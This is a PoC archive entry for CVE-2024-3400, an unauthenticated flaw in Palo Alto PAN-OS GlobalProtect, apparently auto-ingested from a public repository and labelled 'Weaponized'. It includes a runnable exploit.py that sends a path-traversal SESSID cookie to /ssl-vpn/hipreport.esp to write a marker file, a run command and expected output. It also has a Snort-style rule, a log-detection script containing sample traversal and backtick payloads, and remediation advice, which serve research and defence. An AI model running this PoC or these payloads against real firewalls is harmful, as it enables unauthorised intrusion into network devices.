PoC Archive
Critical CVE-2024-3400 patched

Palo Alto PAN-OS GlobalProtect Unauthenticated RCE (CVE-2024-3400)

by h4x0r-dz · 2026-05-17


Metadata

Field                 Value
Date Added            2026-05-17
Author / Researcher   h4x0r-dz
CVE / Advisory        CVE-2024-3400
Category              web
Severity              Critical
CVSS Score            10.0 (CVSSv3.1)
Status                Weaponized
Tags                  RCE, command-injection, path-traversal, PAN-OS, GlobalProtect, unauthenticated, zero-day
Related               N/A

Affected Target

Field                     Value
Software / System         Palo Alto Networks PAN-OS GlobalProtect gateway
Versions Affected         PAN-OS 10.2, 11.0, and 11.1 branches before vendor fixes (GlobalProtect enabled)
Language / Platform       PAN-OS appliance / VM management plane (HTTP/HTTPS)
Authentication Required   No
Network Access Required   Yes

Summary

CVE-2024-3400 is an unauthenticated command injection vulnerability in PAN-OS GlobalProtect that can be reached over the network when specific features are enabled. Public reporting showed chained abuse via arbitrary file creation and command execution as root. The issue was exploited as a zero-day before patch release and later saw broad mass scanning and exploitation activity.


Vulnerability Details

Root Cause

Input from attacker-controlled request components is insufficiently constrained in vulnerable request handling paths tied to GlobalProtect and device telemetry workflows. Attackers can influence file creation paths and inject shell metacharacters, enabling command execution.

Attack Vector

An unauthenticated attacker sends crafted HTTP POST requests to /ssl-vpn/hipreport.esp with a malicious SESSID cookie value. The request can force arbitrary file creation and, in exploit chains, command injection in telemetry-related paths.

Impact

Successful exploitation can lead to remote code execution as root on affected firewalls. This can enable full device compromise, credential theft, traffic interception, and persistent access.


Environment / Lab Setup

OS:          Linux/macOS/Windows attacker host
Target:      Vulnerable PAN-OS GlobalProtect gateway (authorized lab only)
Attacker:    Security testing workstation
Tools:       Python 3, curl (optional)

Setup Steps

cd pocs/web/2026-05-17_pan-os-globalprotect-unauth-rce

python3 exploit.py --target https://<target-host>

Proof of Concept

Step-by-Step Reproduction

  1. Confirm authorized scope and identify a potentially vulnerable PAN-OS target.
  2. Send a crafted unauthenticated request to /ssl-vpn/hipreport.esp with a traversal-style SESSID cookie.
  3. Verify the indicator response by requesting the marker file path and checking for a 403 (a commonly used signal in public PoCs).

Exploit Code

See exploit.py in this folder.

python3 exploit.py --target https://<target-host>

Expected Output

[+] POST /ssl-vpn/hipreport.esp -> HTTP 200
[+] GET /global-protect/portal/images/hellome1337.txt -> HTTP 403
[!] Possible vulnerability indicator observed (403 on marker file).

Screenshots / Evidence

  • screenshots/ — add authorized captures of crafted requests and responses

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert http any any -> $HOME_NET any (
  msg:"Possible PAN-OS CVE-2024-3400 exploitation attempt";
  content:"/ssl-vpn/hipreport.esp"; http_uri;
  content:"SESSID="; http_header;
  sid:952403400; rev:1;
)
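
The rule above keys on the URI and the cookie name only. As an added example (not part of the original PoC repository), the following log-side check inspects the SESSID value itself for the traversal and shell-metacharacter patterns described under Root Cause. The record layout, the sample records and the assumption that a legitimate SESSID is a hex/GUID-style token are constructed for illustration.

```python
import re
from urllib.parse import unquote

HIP_PATH = "/ssl-vpn/hipreport.esp"  # endpoint named in this write-up
# Assumption: a legitimate SESSID is an opaque hex/GUID-style token.
TOKEN_RE = re.compile(r"[0-9A-Fa-f-]{16,64}")
SHELL_META = set("`$|&<>(){}\\ \t\r\n")  # shell metacharacters and whitespace


def cookie_value(header: str, name: str = "SESSID") -> "str | None":
    """Split the Cookie header by hand so hostile values cannot break parsing."""
    for part in header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return None


def findings(method: str, path: str, cookie_header: str) -> list[str]:
    """Return the reasons a request looks like a CVE-2024-3400 attempt."""
    if method.upper() != "POST" or path.split("?", 1)[0] != HIP_PATH:
        return []
    raw = cookie_value(cookie_header)
    if raw is None:
        return []
    value = unquote(unquote(raw))  # normalise single and double percent-encoding
    hits = []
    if ".." in re.split(r"[/\\]", value):
        hits.append("path-traversal")
    if SHELL_META & set(value):
        hits.append("shell-metacharacter")
    if not hits and not TOKEN_RE.fullmatch(value):
        hits.append("unexpected-format")
    return hits


# Constructed sample records: (method, path, Cookie header).
SAMPLE = [
    ("POST", HIP_PATH, "SESSID=3f2b8c1e-9a4d-4e6f-8b7a-1c2d3e4f5a6b"),
    ("POST", HIP_PATH, "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;"),
    ("POST", HIP_PATH, "SESSID=%2f%2e%2e%2f%2e%2e%2ftmp%2fCONSTRUCTED"),
    ("POST", HIP_PATH, "lang=en; SESSID=x`CONSTRUCTED`"),
    ("GET", "/global-protect/portal/images/logo.png", ""),
]

if __name__ == "__main__":
    for record in SAMPLE:
        print(record[0], record[1], findings(*record) or "ok")
```

Feed it records from whatever source exposes the request method, path and Cookie header (reverse proxy, packet capture, IDS HTTP log); an "unexpected-format" hit alone is a triage lead, not proof of exploitation.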

Remediation

Action             Detail
Patch              Upgrade to fixed PAN-OS releases from Palo Alto advisory guidance for CVE-2024-3400
Workaround         Restrict exposure of GlobalProtect and management interfaces to trusted networks only
Config Hardening   Apply Threat Prevention signatures and monitor for traversal/command-injection patterns in VPN logs

References


Notes

Auto-ingested from https://github.com/h4x0r-dz/CVE-2024-3400 on 2026-05-17.

exploit.py
#!/usr/bin/env python3
"""
POC: PAN-OS GlobalProtect unauthenticated file-creation indicator check
CVE: CVE-2024-3400

DISCLAIMER: For authorized security research only.
"""

from __future__ import annotations

import argparse
import ssl
import urllib.error
import urllib.request
from urllib.parse import urljoin


def request(target: str, method: str, path: str, headers: dict[str, str], data: bytes | None = None) -> int:
    url = urljoin(target.rstrip("/") + "/", path.lstrip("/"))
    req = urllib.request.Request(url=url, data=data, method=method)
    for key, value in headers.items():
        req.add_header(key, value)

    context = ssl._create_unverified_context() if target.startswith("https://") else None
    try:
        with urllib.request.urlopen(req, context=context, timeout=15) as response:
            return response.getcode()
    except urllib.error.HTTPError as exc:
        return exc.code
    except urllib.error.URLError as exc:
        print(f"[!] Request to {url} failed: {exc.reason}")
        return -1


def exploit(target: str, marker: str) -> None:
    cookie = f"SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{marker};"
    post_status = request(
        target=target,
        method="POST",
        path="/ssl-vpn/hipreport.esp",
        headers={"Cookie": cookie, "Content-Type": "application/x-www-form-urlencoded"},
        data=b"",
    )
    print(f"[+] POST /ssl-vpn/hipreport.esp -> HTTP {post_status}")

    check_path = f"/global-protect/portal/images/{marker}"
    check_status = request(target=target, method="GET", path=check_path, headers={})
    print(f"[+] GET {check_path} -> HTTP {check_status}")

    if check_status == 403:
        print("[!] Possible vulnerability indicator observed (403 on marker file).")
    elif check_status == 404:
        print("[-] Marker file not reachable (404).")
    else:
        print("[?] Inconclusive response; perform manual validation.")


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(description="CVE-2024-3400 indicator PoC")
    parser.add_argument("--target", required=True, help="Target base URL, e.g. https://firewall.example")
    parser.add_argument("--marker", default="hellome1337.txt", help="Marker filename to use")
    return parser.parse_args()


if __name__ == "__main__":
    args = parse_args()
    exploit(args.target, args.marker)